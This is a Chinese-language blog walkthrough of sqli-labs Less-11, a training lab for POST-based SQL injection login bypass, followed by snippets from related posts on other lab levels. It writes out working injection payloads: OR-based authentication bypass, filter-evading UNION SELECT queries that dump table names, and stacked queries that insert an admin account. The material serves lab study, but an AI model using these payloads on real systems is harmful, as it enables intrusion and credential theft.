【sqli-labs】 less11 POST - Error Based - Single quotes- String (基于错误的POST单引号字符型注入)

查看源码,用户名和密码通过post提交

加单引号提交

出现报错,推测对应的SQL语句

select ... from ... where xxx=‘‘‘ and yyy=‘123‘ limit 0,1

直接使用or构造永真登录

成功,注意此处登录的用户为表中的第一个用户

需要改变用户可以通过改变筛选条件实现

作为表中的第二个用户登录

如果在客户端进行了敏感字符的输入限定,可以直接使用hackbar提交POST数据绕过

如果采用构造这种输入,登录会失败,原因是因为and的优先级是高于or的

yyy=‘test‘返回false然后and运算仍为false, xxx=‘1‘ or false结果为false

也就是说这条查询不会返回任何结果

select ... from ... where xxx=‘1‘ or ‘1‘=‘1‘ and yyy=‘test‘ limit 0,1

注意,如果yyy=‘test‘返回为true,此查询是可以得到结果成功登录的

比如表中一个用户密码为admin

这样是可以作为该用户成功登录的

利用这种思路构造如下注入

可以成功绕过

select ... from ... where xxx=‘1‘ or ‘1‘=‘1‘ or ‘1‘=‘1‘ and yyy=‘test‘ limit 0,1

原文地址:https://www.cnblogs.com/superkrissV/p/8319510.html

时间: 2024-08-26 11:42:20

【sqli-labs】 less11 POST - Error Based - Single quotes- String (基于错误的POST单引号字符型注入)的相关文章

Less(28)GET - Error Based- All your UNION & SELECT belong to us String-Single quote without parenthesis基于错误的,单引号字符型,过滤了union和select等的注入

1.这个和Less(27)差不多,就是把参数变成 id=('1') 2.爆破 (1)爆库:?id=0')%0buniOn%0bsElEct%0b1,database(),3%0bor%0b('1')=('1 (2)爆表:?id=0')%0buniOn%0bsElEct%0b1,(group_concat(table_name)),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema='security'%0b%26%26%0b('

sqli-lab 第一题 单引号 error based single quotes

一.第一次见面 1.初识 http://localhost/Less-1/ 提示输入id,因此访问http://localhost/Less-1/?id=1 可以继续测试id=2.3.4等的情况,会输出不同的用户名和密码 2.进一步了解 每一次都会有不同的账号密码出来,当然肯定不能这样简单的访问. 既然题目说了存在单引号的错误,那就来试一下http://localhost/Less-1/?id=%27 没毛病报错了,说明单引号会被算入sql语句中 假设一下,这个sql语句是这样构造的: $sql

【sqli-labs】 less23 Error based - strip comments (基于错误的去除注释的GET型注入)

. 加单引号报错 加# http://localhost/sqli-labs-master/Less-23/?id=1'%23 错误没有改变,推测过滤了# 查看源码发现# -- 都被替换掉了 那么可用通过闭合单引号的方式 http://localhost/sqli-labs-master/Less-23/?id=1' and '1'='1 然后通过UpdateXml函数利用报错取数据 http://localhost/sqli-labs-master/Less-23/?id=1' and Upd

【sqli-labs】 less27 GET- Error based -All you Union&Select Belong to us -String -Single quote(GET型基于错误的去除了Union和Select的单引号字符串型注入)

看一下过滤函数 看一下/s是什么东西 那直接通过大小写就可以绕过了 http://192.168.136.128/sqli-labs-master/Less-27/?id=0'%a0uNion%a0sElect%a01,2,%273 原文地址:https://www.cnblogs.com/superkrissV/p/8371847.html

【sqli-labs】 less43 POST -Error based -String -Stacked with tiwst(POST型基于错误的堆叠变形字符型注入)

和less42一样 login_user=1&login_password=1');insert into users(id,username,password) value(15,'root','root')# 原文地址:https://www.cnblogs.com/superkrissV/p/8387505.html

【sqli-labs】 less45 POST -Error based -String -Stacked Blind(POST型基于盲注的堆叠字符型注入)

和Less44一个名字 测试一下,发现是')闭合的 login_user=1&login_password=1') or sleep(0.1)# 那就是没有错误显示的less42 login_user=1&login_password=1');insert into users(id,username,password) value(15,'root','root')# 原文地址:https://www.cnblogs.com/superkrissV/p/8391300.html

【sqli-labs】 less41 GET -Blind based -Intiger -Stacked(GET型基于盲注的堆叠查询整型注入)

整型的不用闭合引号 http://192.168.136.128/sqli-labs-master/Less-41/?id=1;insert into users(id,username,password) values (15,'root','root')%23 http://192.168.136.128/sqli-labs-master/Less-41/?id=15 原文地址:https://www.cnblogs.com/superkrissV/p/8386137.html

Sqli labs系列-less-1 详细篇

要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了,我就开始弄这个,毕竟这个里面涉及到的 SQL 注入知识很全,我贴一个下载地址:Sqli labs系列下载地址 对了还有我这个系列的头顶图,那个图是某个低调群的活跃用户装X墙,纯属装 X ,娱乐着玩了,大家别当真哈. 开了正文开始了! 首先我们先开始第一关,然后构造下注入环境,也就是在 http://

Sqli labs系列-less-2 详细篇

就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊...好歹我也是上打过网络安全攻防平台,注入卡在第七关,我下玩过 web_for_pentester ,web渗透靶机2pentester_II_i386,这些靶场的小菜比... 好了,不扯了,现在开始扯这个第二关. 原本想着明天闲着没事了玩玩吧,后来,我今天也是闲的没事,我就继续开始玩玩吧. 结果玩